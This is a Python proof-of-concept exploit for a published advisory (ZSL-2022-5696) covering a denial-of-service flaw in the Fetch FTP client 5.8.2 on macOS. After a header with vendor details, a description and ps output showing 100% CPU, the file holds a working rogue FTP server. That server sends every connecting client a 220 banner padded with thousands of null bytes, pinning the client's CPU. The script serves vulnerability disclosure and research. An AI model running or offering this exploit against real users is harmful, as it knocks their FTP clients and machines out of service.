#!/usr/bin/env python
#
#
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
#
#
# Vendor: Fetch Softworks
# Product web page: https://www.fetchsoftworks.com
# Affected version: 5.8.2 (5K1354)
#
# Summary: Fetch is a reliable, full-featured file transfer client for the
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
# the Internet for compatibility with thousands of Internet service providers,
# web hosting companies, publishers, pre-press companies, and more.
#
# Desc: The application is prone to a DoS after receiving a long server response
# (more than 2K bytes) leading to 100% CPU consumption.
#
# --------------------------------------------------------------------------------
# ~/Desktop> ps ucp 3498
# USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
# lqwrm 3498 100.0 0.5 60081236 54488 ?? R 5:44PM 4:28.97 Fetch-5K1354-266470421
# ~/Desktop>
# --------------------------------------------------------------------------------
#
# Tested on: macOS Monterey 12.2
# macOS Big Sur 11.6.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5696
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
#
#
# 27.01.2022
#
import socket
host = '0.0.0.0'
port = 21
s = socket.socket()
s.bind((host, port))
s.listen(2)
print('Ascolto su', host, 'porta', port, '...')
consumptor = '220\x20'
consumptor += 'ftp.zeroscience.mk'
consumptor += '\x00' * 0x101E
consumptor += '\x0D\x0A'
while True:
try:
c, a = s.accept()
print('Connessione da', a)
print('CPU 100%, Memory++')
c.send(bytes(consumptor, 'UTF-8'))
c.send(b'Thricer OK, p\'taah\x0A\x0D')
print(c.recv(17))
except:
break